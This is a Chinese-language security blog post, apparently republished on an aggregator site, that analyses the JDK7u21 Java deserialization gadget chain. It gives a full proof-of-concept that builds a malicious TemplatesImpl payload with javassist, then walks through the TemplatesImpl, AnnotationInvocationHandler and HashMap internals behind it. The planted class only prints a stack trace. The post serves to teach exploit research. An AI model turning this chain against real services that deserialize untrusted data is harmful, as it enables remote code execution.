主頁 > 企業開發 > JDK7u21反序列化詳解

JDK7u21反序列化詳解

2021-09-14 09:29:41 企業開發

目錄
  • 前言
  • 環境
  • 倒序分析
    • TemplatesImpl
    • AnnotationInvocationHandler
    • HashMap
  • 總結

前言

聽說jdk7u21的反序列化涉及的知識量很多,很難啃,具體來看看咋回事

環境

jdk7u21

IDEA 2021.1.2

javassist

<dependency>
    <groupId>org.javassist</groupId>
    <artifactId>javassist</artifactId>
    <version>3.21.0-GA</version>
</dependency>

使用的代碼如下,復現時推薦手寫一遍

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import java.io.*;
import java.lang.reflect.*;
import java.util.*;
import java.lang.reflect.Proxy;
import javassist.ClassPool;
import javassist.CtClass;
import javax.xml.transform.Templates;

public class Main{
    public static void main(String[] args) throws Exception {
        // 生成惡意類的位元組碼
        ClassPool pool = ClassPool.getDefault();
        CtClass payload = pool.makeClass("EvilClass");
        payload.setSuperclass(pool.get("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet"));
        payload.makeClassInitializer().setBody("new java.io.IOException().printStackTrace();");
        byte[] evilClass = payload.toBytecode();

        // 創建templates物件,并反射修改其中的屬性
        TemplatesImpl templates = new TemplatesImpl();
        Field bytecodes = templates.getClass().getDeclaredField("_bytecodes");
        bytecodes.setAccessible(true);
        bytecodes.set(templates, new byte[][]{evilClass});  // 注意這里是byte二維陣列
        // 反射修改值
        Field name = templates.getClass().getDeclaredField("_name");
        name.setAccessible(true);
        name.set(templates, "test");
        // 反射修改值
        Field tfactory = templates.getClass().getDeclaredField("_tfactory");
        tfactory.setAccessible(true);
        tfactory.set(templates, new TransformerFactoryImpl());

        // 修改值
        Field auxClasses = templates.getClass().getDeclaredField("_auxClasses");
        auxClasses.setAccessible(true);
        auxClasses.set(templates, null);

        Field aClass = templates.getClass().getDeclaredField("_class");
        aClass.setAccessible(true);
        aClass.set(templates, null);
        
        // key為固定值,后面會解釋
        String key = "f5a5a608";
        HashMap map = new HashMap();
        map.put(key, "xxx");

        // 獲取構造器,并使用動態代理,創建proxy物件
        Constructor<?> declaredConstructor = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructors()[0];
        declaredConstructor.setAccessible(true);
        InvocationHandler invocationHandler = (InvocationHandler) declaredConstructor.newInstance(Templates.class, map);// AnnotationInvocationHandler.memberValues -> hashMap  type->Templates.Class
        
        Templates proxy = (Templates) Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(), templates.getClass().getInterfaces(), invocationHandler);

        LinkedHashSet linkedHashSet = new LinkedHashSet(); // 序列化物件
        linkedHashSet.add(templates);
        linkedHashSet.add(proxy);
        map.put(key, templates);  // 修改key對應的value,避免本地觸發payload

        // 模擬序列化和反向序列化
        ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream("test.out"));
        outputStream.writeObject(linkedHashSet);
        outputStream.close();

        ObjectInputStream inputStream=new ObjectInputStream(new FileInputStream("test.out"));
        inputStream.readObject();
	}
}

倒序分析

執行上面的java代碼,由于給定執行的代碼為new java.io.IOException().printStackTrace();,所以會報錯顯示如下資訊:

at EvilClass.<clinit>(EvilClass.java)
...
at java.lang.reflect.Constructor.newInstance(Constructor.java:525)
at java.lang.Class.newInstance0(Class.java:374)
at java.lang.Class.newInstance(Class.java:327)
at com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.getTransletInstance(TemplatesImpl.java:380)
at com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.newTransformer(TemplatesImpl.java:410)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:601)
at sun.reflect.annotation.AnnotationInvocationHandler.equalsImpl(AnnotationInvocationHandler.java:197)
at sun.reflect.annotation.AnnotationInvocationHandler.invoke(AnnotationInvocationHandler.java:59)
at com.sun.proxy.$Proxy0.equals(Unknown Source)
at java.util.HashMap.put(HashMap.java:475)
at java.util.HashSet.readObject(HashSet.java:309)
...
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:370)
at com.bitterz.stream.CommonCollectionsLearn.main(CommonCollectionsLearn.java:130)

這里省略的部分都是反射或者native方法,不是呼叫鏈的關鍵資訊,從上往下倒退可以看出,EvilClass在使用構造方法時觸發惡意代碼,構造方法是從TemplatesImpl#newTransformer->TemplatesImpl#getTransletInstance->Class.newInstance()觸發的,那我們先看看TemplatesImpl這個類的呼叫程序

TemplatesImpl

  • TemplatesImpl#getTransletInstance
private Translet getTransletInstance() throws TransformerConfigurationException {
    try {
        if (_name == null) return null;

        if (_class == null) defineTransletClasses();

        // The translet needs to keep a reference to all its auxiliary
        // class to prevent the GC from collecting them
        AbstractTranslet translet = (AbstractTranslet) _class[_transletIndex].newInstance();
        translet.postInitialization();
        translet.setTemplates(this);
        translet.setServicesMechnism(_useServicesMechanism);
        if (_auxClasses != null) {
            translet.setAuxiliaryClasses(_auxClasses);
        }

        return translet;
    }
    catch (){}
}

看到前面兩個filed頓感熟悉呀,我們的代碼里面正好把Templates物件的_name_class設定"test"和null了,所以會執行TemplatesImpl#defineTransletClasses方法,跟進一下這個方法

  • TemplatesImpl#defineTransletClasses
private void defineTransletClasses() throws TransformerConfigurationException {
    if (_bytecodes == null) {//throw exception;}

    TransletClassLoader loader = (TransletClassLoader) ..; // 獲取類加載器

    try {
        final int classCount = _bytecodes.length;
        _class = new Class[classCount];

        if (classCount > 1) {
            _auxClasses = new Hashtable();
        }

        for (int i = 0; i < classCount; i++) {
            _class[i] = loader.defineClass(_bytecodes[i]);
            final Class superClass = _class[i].getSuperclass();

            // Check if this is the main class
            if (superClass.getName().equals(ABSTRACT_TRANSLET)) {
                _transletIndex = i;
            }
            else {
                _auxClasses.put(_class[i].getName(), _class[i]);
            }
        }

        if (_transletIndex < 0) {
            ErrorMsg err= new ErrorMsg(ErrorMsg.NO_MAIN_TRANSLET_ERR, _name);
            throw new TransformerConfigurationException(err.toString());
        }
    }
    catch (){}
}

繼續省略了報錯、catch等不關鍵代碼,這里有兩個關鍵點:

  • 由于_bytecodes被我們為new byte[][]{evilClass},也就是存放了惡意位元組碼,所以進入try代碼塊中,這里最關鍵的代碼是_class[i] = loader.defineClass(_bytecodes[i]);,也就是遍歷_bytecodes陣列中的所有位元組碼,然后用defineClass方法將其加載到jvm中,并回傳一個類物件到_class陣列中,
  • if (superClass.getName().equals(ABSTRACT_TRANSLET)) {_transletIndex = i;},由于我們使用動態代理創建類時,呼叫的是無參構造方法,所以ABSTRACT_TRANSLET="com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet",另外我們給進去的惡意類的父類也被設定為com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet,所以superClass.getName().equals(ABSTRACT_TRANSLET)為true,執行代碼_transletIndex = i;,此時i=0,

defineTransletClasses方法執行完后,回傳到TemplatesImpl#getTransletInstance的中,執行 AbstractTranslet translet = (AbstractTranslet) _class[_transletIndex].newInstance();這里由于_class中只有一個惡意類物件,而且_transletIndex剛好為0,所以觸發惡意類的構造方法,

TemplatesImpl類中呼叫鏈也就分析完了,那么來看看newTransformer方法為何會被呼叫

AnnotationInvocationHandler

這一段的呼叫鏈是

at sun.reflect.annotation.AnnotationInvocationHandler.equalsImpl(AnnotationInvocationHandler.java:197)
at sun.reflect.annotation.AnnotationInvocationHandler.invoke(AnnotationInvocationHandler.java:59)
at com.sun.proxy.$Proxy0.equals(Unknown Source)
java.util.HashMap.put(HashMap.java:475)

先來看看呼叫鏈是如何從HashMap.putAnnotationInvocationHandler.invoke的,HashMap#put方法如下

public V put(K key, V value) {
    if (key == null)
        return putForNullKey(value);
    int hash = hash(key);
    int i = indexFor(hash, table.length);
    for (Entry<K,V> e = table[i]; e != null; e = e.next) {
        Object k;
        if (e.hash == hash && ((k = e.key) == key || key.equals(k))) {
            V oldValue = https://www.cnblogs.com/bitterz/p/e.value;
            e.value = value;
            e.recordAccess(this);
            return oldValue;
        }
    }

    modCount++;
    addEntry(hash, key, value, i);
    return null;
}

呼叫鏈中com.sun.proxy.$Proxy0.equals實際上指的是動態代理創建的物件呼叫了其equals方法,所以我們可以定位到key.equals(k),而在衣服陳述句的第二條中執行了k=e.key,而e=table[i],這里實際上涉及到LinkedHashSet的鍵值存盤方式問題,這里先直接給結論,k就是惡意類物件templates,后面再分析為什么,

由于動態代理創建的類呼叫了其equals方法,根據動態代理的特性,會呼叫到代理類AnnotationInvocationHandler#invoke方法,那么來具體看看這個方法

public Object invoke(Object var1, Method var2, Object[] var3) {
    String var4 = var2.getName();
    Class[] var5 = var2.getParameterTypes();
    if (var4.equals("equals") && var5.length == 1 && var5[0] == Object.class) {
        return this.equalsImpl(var3[0]);
    } else {
        assert var5.length == 0;

        if (var4.equals("toString")) {
            return this.toStringImpl();
        } else if (var4.equals("hashCode")) {
            return this.hashCodeImpl();
        } else if (var4.equals("annotationType")) {
            return this.type;
        } else {
            Object var6 = this.memberValues.get(var4);
            if (var6 == null) {
                throw new IncompleteAnnotationException(this.type, var4);
            } else if (var6 instanceof ExceptionProxy) {
                throw ((ExceptionProxy)var6).generateException();
            } else {
                if (var6.getClass().isArray() && Array.getLength(var6) != 0) {
                    var6 = this.cloneArray(var6);
                }

                return var6;
            }
        }
    }
}

在實際的呼叫中,傳入的引數:var1=proxy, var2=equals, var3=templates惡意類物件,equals方法需要的引數型別為Object,因此第一個if條件為true,進入AnnotationInvocationHandler#equalsImpl方法,跟進一下這個方法

private Boolean equalsImpl(Object var1) {
    if (var1 == this) {
        return true;
    } else if (!this.type.isInstance(var1)) {
        return false;
    } else {
        Method[] var2 = this.getMemberMethods();
        int var3 = var2.length;

        for(int var4 = 0; var4 < var3; ++var4) {
            Method var5 = var2[var4];
            String var6 = var5.getName();
            Object var7 = this.memberValues.get(var6);
            Object var8 = null;
            AnnotationInvocationHandler var9 = this.asOneOfUs(var1);
            if (var9 != null) {
                var8 = var9.memberValues.get(var6);
            } else {
                try {
                    var8 = var5.invoke(var1);
                } catch (InvocationTargetException var11) {
                    return false;
                } catch (IllegalAccessException var12) {
                    throw new AssertionError(var12);
                }
            }

            if (!memberValueEquals(var7, var8)) {
                return false;
            }
        }

        return true;
    }
}

此時,傳入的引數var1=templates惡意物件,這個方法中最重要的代碼塊是for回圈,但是要先看看for回圈前面的兩行代碼,跟進一下AnnotationInvocationHandler#getMemberMethods方法

private Method[] getMemberMethods() {
    if (this.memberMethods == null) {
        this.memberMethods = (Method[])AccessController.doPrivileged(new PrivilegedAction<Method[]>() {
            public Method[] run() {
                Method[] var1 = AnnotationInvocationHandler.this.type.getDeclaredMethods();
                AccessibleObject.setAccessible(var1, true);
                return var1;
            }
        });
    }

    return this.memberMethods;
}
AnnotationInvocationHandler(Class<? extends Annotation> var1, Map<String, Object> var2) {
    this.type = var1;
    this.memberValues = var2;
}  // 我們的代碼中反射呼叫的構造方法

這里需要回看一下我們的代碼反射創建AnnotationInvocationHandler物件的部分以及AnnotationInvocationHandler的構造方法,因為我們傳入的兩個引數是Templates.class和HashMap物件,所以AnnotationInvocationHandler#getMemberMethods獲取的就是Templates的所有方法物件,然后我們回到AnnotationInvocationHandler#equalsImpl方法的for回圈部分,這里有兩個關鍵點:

  • var9,呼叫AnnotationInvocationHandler#isOneOfUs(Object),代碼比較簡單,就不跟進了,回傳值為null
  • var5.invoke(var1),由于var9為null,所以for回圈也就意味著遍歷呼叫Templates所有方法,而且呼叫物件是傳入的var1,也就是我們構造的惡意物件templates

templates的各種引數被精心設計過,所以會從newTransformer呼叫到惡意類的構造方法,從而觸發其中的惡意代碼,到這里,我們梳理通了AnnotationInvocationHandler中的呼叫鏈,但有個問題沒有解決,那就是前面提到的HashMap#put方法那一個關鍵的if陳述句

if (e.hash == hash && ((k = e.key) == key || key.equals(k)))

HashMap

現在來看看HashMap#put前面的呼叫鏈

at java.util.HashMap.put(HashMap.java:475)
at java.util.HashSet.readObject(HashSet.java:309)
...
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:370)

省略ObjectInputStream#readObject之后的不重要的呼叫堆疊,由于ObjectInputStream#readObject反序列化時,會自動呼叫被反序列化類的readObject方法,也就是LinkedHashSet,我們的代碼中序列化的類,而LinkedHashSet沒有實作readObject方法,而是繼承自HashSet,所以呼叫了HashSet#readObject跟進一下該方法

  • HashSet#readObject
private void readObject(java.io.ObjectInputStream s)
    throws java.io.IOException, ClassNotFoundException {
    // Read in any hidden serialization magic
    s.defaultReadObject();

    // Read in HashMap capacity and load factor and create backing HashMap
    int capacity = s.readInt();
    float loadFactor = s.readFloat();
    map = (((HashSet)this) instanceof LinkedHashSet ?
           new LinkedHashMap<E,Object>(capacity, loadFactor) :
           new HashMap<E,Object>(capacity, loadFactor));

    // Read in size
    int size = s.readInt();

    // Read in all elements in the proper order.
    for (int i=0; i<size; i++) {
        E e = (E) s.readObject();
        map.put(e, PRESENT);
    }
}
  • HashSet#add
Object PRESENT = new Object();
public boolean add(E e) {
	return map.put(e, PRESENT)==null;
}

從readObject的for回圈處和add方法可見,HashSet管理輸入的鍵值的方法是,將輸入物件作為HashMap的key,以保證其唯一性,可以add重復的值,列印HashSet#size檢驗,

繼續說HashSet#readObject方法,先創建一個map后,用s.readInt()獲取序列化時hashSet的size,然后進入for回圈,依次讀取序列化時HashSet中的每個物件,并作為map的key,這時就會呼叫到HashMap#put方法

  • HashMap#put
public V put(K key, V value) {
    if (key == null)
        return putForNullKey(value);
    int hash = hash(key);
    int i = indexFor(hash, table.length);
    for (Entry<K,V> e = table[i]; e != null; e = e.next) {
        Object k;
        if (e.hash == hash && ((k = e.key) == key || key.equals(k))) {
            V oldValue = https://www.cnblogs.com/bitterz/p/e.value;
            e.value = value;
            e.recordAccess(this);
            return oldValue;
        }
    }

    modCount++;
    addEntry(hash, key, value, i);
    return null;
}

由于真正觸發惡意代碼的是HashMap.put(proxy)時觸發,此時templates已經反序列化好了,所以我們從這個基礎角度去看代碼,key=proxy,value=https://www.cnblogs.com/bitterz/p/object

呼叫hash(key)獲取hash值,跟進一下這個方法

  • HashMap#hash
final int hash(Object k) {
    int h = 0;
    if (useAltHashing) {
        if (k instanceof String) {
            return sun.misc.Hashing.stringHash32((String) k);
        }
        h = hashSeed;
    }

    h ^= k.hashCode();

    // This function ensures that hashCodes that differ only by
    // constant multiples at each bit position have a bounded
    // number of collisions (approximately 8 at default load factor).
    h ^= (h >>> 20) ^ (h >>> 12);
    return h ^ (h >>> 7) ^ (h >>> 4);
}

此時k=proxy,if判斷為空,所以h=0,執行到k.hashCode(),由于k=proxy,所以會呼叫AnnotationInvocationHandler.invoke方法

這里就不重復粘貼代碼了,通過一些列if判斷后,會進入AnnotationInvocationHandler#hashCodeImpl方法,跟進一下該方法

  • AnnotationInvocationHandler#hashCodeImpl
private int hashCodeImpl() {
    int var1 = 0;

    Entry var3;
    for(Iterator var2 = this.memberValues.entrySet().iterator(); var2.hasNext(); var1 += 127 * ((String)var3.getKey()).hashCode() ^ memberValueHashCode(var3.getValue())) {
        var3 = (Entry)var2.next();
    }

    return var1;
}

此時需要注意的是,this.memberValues是我們的代碼中創建AnnotationInvocationHandler物件時給進去的HashMap,這個HashMap只有一個鍵值對("f5a5a608"->templates),在這個基礎下,繼續分析這里的代碼,for回圈先得到var3=("f5a5a608"->templates),然后執行var1+=......

計算第一部分((String)var3.getKey()).hashCode(),var3.getKey()="f5a5a608"

很巧的是,"f5a5a608".hashCode()恰好為0,找出這個呼叫鏈的大神也太猛了- _ -!,繼續看memberValueHashCode(var3.getValue()),var3.getValue()=templates,然后跟進一下AnnotationInvocationHandler#memberValueHashCode(templates)

  • AnnotationInvocationHandler#memberValueHashCode
private static int memberValueHashCode(Object var0) {
    Class var1 = var0.getClass();
    if (!var1.isArray()) {
        return var0.hashCode();
    } else if (var1 == byte[].class) {
        return Arrays.hashCode((byte[])((byte[])var0));
    } else if (var1 == char[].class) {
        return Arrays.hashCode((char[])((char[])var0));
    } else if (var1 == double[].class) {
        return Arrays.hashCode((double[])((double[])var0));
    } else if (var1 == float[].class) {
        return Arrays.hashCode((float[])((float[])var0));
    } else if (var1 == int[].class) {
        return Arrays.hashCode((int[])((int[])var0));
    } else if (var1 == long[].class) {
        return Arrays.hashCode((long[])((long[])var0));
    } else if (var1 == short[].class) {
        return Arrays.hashCode((short[])((short[])var0));
    } else {
        return var1 == boolean[].class ? Arrays.hashCode((boolean[])((boolean[])var0)) : Arrays.hashCode((Object[])((Object[])var0));
    }
}

此時的輸入var0=templates,直接進入第一個if陳述句代碼塊,回傳templates.hashCode(),假定其為X,然后回傳到AnnotationInvocationHandler#hashCodeImpl,var1就變成了 0 + 127 * 0 ^ X,(^表示異或,0^某數字=某數字)根據java的運算子順序127 * 0 = 0,再0 ^ X = X,所以var1 = X,然后從AnnotationInvocationHandler#hashCodeImpl回傳到HashMap#hash,其中的變數h經過后面部分的處理后假定其值為Y,然后代碼繼續向下運行

  • HashMap#put
public V put(K key, V value) {
    if (key == null)
        return putForNullKey(value);
    int hash = hash(key);
    int i = indexFor(hash, table.length);
    for (Entry<K,V> e = table[i]; e != null; e = e.next) {
        Object k;
        if (e.hash == hash && ((k = e.key) == key || key.equals(k))) {
            V oldValue = https://www.cnblogs.com/bitterz/p/e.value;
            e.value = value;
            e.recordAccess(this);
            return oldValue;
        }
    }

    modCount++;
    addEntry(hash, key, value, i);
    return null;
}

此時變數hash=Y,key=proxy,value=https://www.cnblogs.com/bitterz/p/object,執行i=indexFor(hash, table.length),由于前面只反序列化了一個物件也就是templates,所以i=0,進入for回圈檢查輸入的key是否已經存在了,首先e = ,而e.hash是多少呢?

這時我們需要將put方法的輸入帶入key=templates, value=https://www.cnblogs.com/bitterz/p/object來思考,hash=HashMap.hash(templates),在HashMap#hash方法中呼叫templates.hashCode()獲得值X!!,然后繼續后面的處理,這不就直接獲得一個值Y嗎?!,hash=Y,然后往下執行,進入addEntry()方法,

void addEntry(int hash, K key, V value, int bucketIndex) {
        if ((size >= threshold) && (null != table[bucketIndex])) {
            resize(2 * table.length);
            hash = (null != key) ? hash(key) : 0;
            bucketIndex = indexFor(hash, table.length);
        }

        createEntry(hash, key, value, bucketIndex);  // 進入這里 hash=Y
    }

void createEntry(int hash, K key, V value, int bucketIndex) {
        Entry<K,V> e = table[bucketIndex];
        table[bucketIndex] = new Entry<>(hash, key, value, e);  // 新建一個Entry,跟進其構造方法 hash=Y
        size++;
    }

Entry(int h, K k, V v, Entry<K,V> n) {  // 構造方法
            value = https://www.cnblogs.com/bitterz/p/v;
            next = n;
            key = k;
            hash = h;  // hash=h=Y
        }

看了這個呼叫鏈就可以知道,e = Entry<templates, object> 這個物件的e.hash就等于Y!,回到HashMap#put方法

此時if條件一步一步滿足,這里其實涉及到java中if陳述句的短路特性,在&&判斷時,如果第一個條件為false,則直接判定為false,所以e.hash==hash必須為true才會執行到key.equals(k),不得不佩服這個利用鏈的構造者,java功底太深了,

同時到這里也就很容易理解,為什么我們的代碼要在linkeHashSet.add之后才對AnnotationInvocationHandler.menberValues中的鍵值對進行修改為<"f5a5a6018", templates>,因為提前就寫好的話,在linkeHashSet.add(proxy)的時候就會本地觸發惡意代碼

總結

到這里整個呼叫鏈的分析就完成了

  • 首先是LinkedHashSet.readObject實際呼叫HashSet.readObject,任何將templates反序列化出來,這里又涉及到HashMap來管理HashSet的物件,以及HashMap將key->value對用內部類Entry來管理,并且這個Entry.hash=HashMap.hash(key),
  • 而后,在HashSet.readObject中反序列化proxy物件,該物件是動態代理創建的,所以其實先會把AnnotationInvocationHandler反序列化出來,并且其中的memberValues=HashMap<"f5a5a6018"->templates>只有這一個鍵值對,而后進入HashMap.put方法中,在HashMap.hash(proxy)時,觸發代理類的invoke方法,進入AnnotationInvocationHandler#hashCodeImpl方法,而此時又由于AnnotationInvocationHandler.memberValues中的key,也就是"f5a5a6018"的hash值恰好為0,導致AnnotationInvocationHandler#hashCodeImpl的回傳值為templates物件的hash值,而后回傳到HashMap.hash(proxy)時,其回傳值與HashMap.hash(templates)相同,也就導致HashMap.put方法中判斷key是否重復時,繞過短路特性,執行到后面的key.equals(k),也就是proxy.equals(templates)方法
  • 此后由于動態代理的特性,進入AnnotationInvocationHandler.invoke方法,再進入equalsImpl方法,并在其中呼叫templates的所有方法,從而觸發到TemplatesImpl的惡意呼叫鏈,將惡意位元組碼通過defineClass加載到jvm中,并呼叫其構造方法,從而觸發惡意代碼,實作RCE,

這里還有一個小點需要補充,網上說TemplatesImpl呼叫鏈都是getOutputProperties開始的

at com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.getTransletInstance(TemplatesImpl.java:380)
at com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.newTransformer(TemplatesImpl.java:410)
at com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.getOutputProperties(TemplatesImpl.java:431)
...
at sun.reflect.annotation.AnnotationInvocationHandler.equalsImpl(AnnotationInvocationHandler.java:197)
at sun.reflect.annotation.AnnotationInvocationHandler.invoke(AnnotationInvocationHandler.java:59)
at com.sun.proxy.$Proxy0.equals(Unknown Source)

但實際上,注釋掉_tfactory和_auxClasses反射修改值的代碼才會從getOutputProperties觸發,如果不注釋,則直接從newTransformer觸發,并且這兩個field對呼叫鏈不產生影響,


作者:bitterz 地址:https://www.cnblogs.com/bitterz/ 本文著作權歸作者和博客園所有,歡迎轉載,轉載請標明出處, 如果您覺得本篇博文對您有所識訓,請點擊右下角的 [推薦],謝謝!

轉載請註明出處,本文鏈接:https://www.uj5u.com/qiye/299887.html

標籤:訊息安全

上一篇:Burp_Suite_Pro_v1.7.37的安裝配置

下一篇:JDK7u21反序列化詳解

標籤雲
其他(157675) Python(38076) JavaScript(25376) Java(17977) C(15215) 區塊鏈(8255) C#(7972) AI(7469) 爪哇(7425) MySQL(7132) html(6777) 基礎類(6313) sql(6102) 熊猫(6058) PHP(5869) 数组(5741) R(5409) Linux(5327) 反应(5209) 腳本語言(PerlPython)(5129) 非技術區(4971) Android(4554) 数据框(4311) css(4259) 节点.js(4032) C語言(3288) json(3245) 列表(3129) 扑(3119) C++語言(3117) 安卓(2998) 打字稿(2995) VBA(2789) Java相關(2746) 疑難問題(2699) 细绳(2522) 單片機工控(2479) iOS(2429) ASP.NET(2402) MongoDB(2323) 麻木的(2285) 正则表达式(2254) 字典(2211) 循环(2198) 迅速(2185) 擅长(2169) 镖(2155) 功能(1967) .NET技术(1958) Web開發(1951) python-3.x(1918) HtmlCss(1915) 弹簧靴(1913) C++(1909) xml(1889) PostgreSQL(1872) .NETCore(1853) 谷歌表格(1846) Unity3D(1843) for循环(1842)

熱門瀏覽
  • IEEE1588PTP在數字化變電站時鐘同步方面的應用

    IEEE1588ptp在數字化變電站時鐘同步方面的應用 京準電子科技官微——ahjzsz 一、電力系統時間同步基本概況 隨著對IEC 61850標準研究的不斷深入,國內外學者提出基于IEC61850通信標準體系建設數字化變電站的發展思路。數字化變電站與常規變電站的顯著區別在于程序層傳統的電流/電壓互 ......

    uj5u.com 2020-09-10 03:51:52 more
  • HTTP request smuggling CL.TE

    CL.TE 簡介 前端通過Content-Length處理請求,通過反向代理或者負載均衡將請求轉發到后端,后端Transfer-Encoding優先級較高,以TE處理請求造成安全問題。 檢測 發送如下資料包 POST / HTTP/1.1 Host: ac391f7e1e9af821806e890 ......

    uj5u.com 2020-09-10 03:52:11 more
  • 網路滲透資料大全單——漏洞庫篇

    網路滲透資料大全單——漏洞庫篇漏洞庫 NVD ——美國國家漏洞庫 →http://nvd.nist.gov/。 CERT ——美國國家應急回應中心 →https://www.us-cert.gov/ OSVDB ——開源漏洞庫 →http://osvdb.org Bugtraq ——賽門鐵克 →ht ......

    uj5u.com 2020-09-10 03:52:15 more
  • 京準講述NTP時鐘服務器應用及原理

    京準講述NTP時鐘服務器應用及原理京準講述NTP時鐘服務器應用及原理 安徽京準電子科技官微——ahjzsz 北斗授時原理 授時是指接識訓通過某種方式獲得本地時間與北斗標準時間的鐘差,然后調整本地時鐘使時差控制在一定的精度范圍內。 衛星導航系統通常由三部分組成:導航授時衛星、地面檢測校正維護系統和用戶 ......

    uj5u.com 2020-09-10 03:52:25 more
  • 利用北斗衛星系統設計NTP網路時間服務器

    利用北斗衛星系統設計NTP網路時間服務器 利用北斗衛星系統設計NTP網路時間服務器 安徽京準電子科技官微——ahjzsz 概述 NTP網路時間服務器是一款支持NTP和SNTP網路時間同步協議,高精度、大容量、高品質的高科技時鐘產品。 NTP網路時間服務器設備采用冗余架構設計,高精度時鐘直接來源于北斗 ......

    uj5u.com 2020-09-10 03:52:35 more
  • 詳細解讀電力系統各種對時方式

    詳細解讀電力系統各種對時方式 詳細解讀電力系統各種對時方式 安徽京準電子科技官微——ahjzsz,更多資料請添加VX 衛星同步時鐘是我京準公司開發研制的應用衛星授時時技術的標準時間顯示和發送的裝置,該裝置以M國全球定位系統(GLOBAL POSITIONING SYSTEM,縮寫為GPS)或者我國北 ......

    uj5u.com 2020-09-10 03:52:45 more
  • 如何保證外包團隊接入企業內網安全

    不管企業規模的大小,只要企業想省錢,那么企業的某些服務就一定會采用外包的形式,然而看似美好又經濟的策略,其實也有不好的一面。下面我通過安全的角度來聊聊使用外包團的安全隱患問題。 先看看什么服務會使用外包的,最常見的就是話務/客服這種需要大量重復性、無技術性的服務,或者是一些銷售外包、特殊的職能外包等 ......

    uj5u.com 2020-09-10 03:52:57 more
  • PHP漏洞之【整型數字型SQL注入】

    0x01 什么是SQL注入 SQL是一種注入攻擊,通過前端帶入后端資料庫進行惡意的SQL陳述句查詢。 0x02 SQL整型注入原理 SQL注入一般發生在動態網站URL地址里,當然也會發生在其它地發,如登錄框等等也會存在注入,只要是和資料庫打交道的地方都有可能存在。 如這里http://192.168. ......

    uj5u.com 2020-09-10 03:55:40 more
  • [GXYCTF2019]禁止套娃

    git泄露獲取原始碼 使用GET傳參,引數為exp 經過三層過濾執行 第一層過濾偽協議,第二層過濾帶引數的函式,第三層過濾一些函式 preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'] (?R)參考當前正則運算式,相當于匹配函式里的引數 因此傳遞 ......

    uj5u.com 2020-09-10 03:56:07 more
  • 等保2.0實施流程

    流程 結論 ......

    uj5u.com 2020-09-10 03:56:16 more
最新发布
  • 使用Django Rest framework搭建Blog

    在前面的Blog例子中我們使用的是GraphQL, 雖然GraphQL的使用處于上升趨勢,但是Rest API還是使用的更廣泛一些. 所以還是決定回到傳統的rest api framework上來, Django rest framework的官網上給了一個很好用的QuickStart, 我參考Qu ......

    uj5u.com 2023-04-20 08:17:54 more
  • 記錄-new Date() 我忍你很久了!

    這里給大家分享我在網上總結出來的一些知識,希望對大家有所幫助 大家平時在開發的時候有沒被new Date()折磨過?就是它的諸多怪異的設定讓你每每用的時候,都可能不小心踩坑。造成程式意外出錯,卻一下子找不到問題出處,那叫一個煩透了…… 下面,我就列舉它的“四宗罪”及應用思考 可惡的四宗罪 1. Sa ......

    uj5u.com 2023-04-20 08:17:47 more
  • 使用Vue.js實作文字跑馬燈效果

    實作文字跑馬燈效果,首先用到 substring()截取 和 setInterval計時器 clearInterval()清除計時器 效果如下: 實作代碼如下: <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta ......

    uj5u.com 2023-04-20 08:12:31 more
  • JavaScript 運算子

    JavaScript 運算子/運算子 在 JavaScript 中,有一些運算子可以使代碼更簡潔、易讀和高效。以下是一些常見的運算子: 1、可選鏈運算子(optional chaining operator) ?.是可選鏈運算子(optional chaining operator)。?. 可選鏈操 ......

    uj5u.com 2023-04-20 08:02:25 more
  • CSS—相對單位rem

    一、概述 rem是一個相對長度單位,它的單位長度取決于根標簽html的字體尺寸。rem即root em的意思,中文翻譯為根em。瀏覽器的文本尺寸一般默認為16px,即默認情況下: 1rem = 16px rem布局原理:根據CSS媒體查詢功能,更改根標簽的字體尺寸,實作rem單位隨螢屏尺寸的變化,如 ......

    uj5u.com 2023-04-20 08:02:21 more
  • 我的第一個NPM包:panghu-planebattle-esm(胖虎飛機大戰)使用說明

    好家伙,我的包終于開發完啦 歡迎使用胖虎的飛機大戰包!! 為你的主頁添加色彩 這是一個有趣的網頁小游戲包,使用canvas和js開發 使用ES6模塊化開發 效果圖如下: (覺得圖片太sb的可以自己改) 代碼已開源!! Git: https://gitee.com/tang-and-han-dynas ......

    uj5u.com 2023-04-20 08:01:50 more
  • 如何在 vue3 中使用 jsx/tsx?

    我們都知道,通常情況下我們使用 vue 大多都是用的 SFC(Signle File Component)單檔案組件模式,即一個組件就是一個檔案,但其實 Vue 也是支持使用 JSX 來撰寫組件的。這里不討論 SFC 和 JSX 的好壞,這個仁者見仁智者見智。本篇文章旨在帶領大家快速了解和使用 Vu ......

    uj5u.com 2023-04-20 08:01:37 more
  • 【Vue2.x原始碼系列06】計算屬性computed原理

    本章目標:計算屬性是如何實作的?計算屬性快取原理以及洋蔥模型的應用?在初始化Vue實體時,我們會給每個計算屬性都創建一個對應watcher,我們稱之為計算屬性watcher ......

    uj5u.com 2023-04-20 08:01:31 more
  • http1.1與http2.0

    一、http是什么 通俗來講,http就是計算機通過網路進行通信的規則,是一個基于請求與回應,無狀態的,應用層協議。常用于TCP/IP協議傳輸資料。目前任何終端之間任何一種通信方式都必須按Http協議進行,否則無法連接。tcp(三次握手,四次揮手)。 請求與回應:客戶端請求、服務端回應資料。 無狀態 ......

    uj5u.com 2023-04-20 08:01:10 more
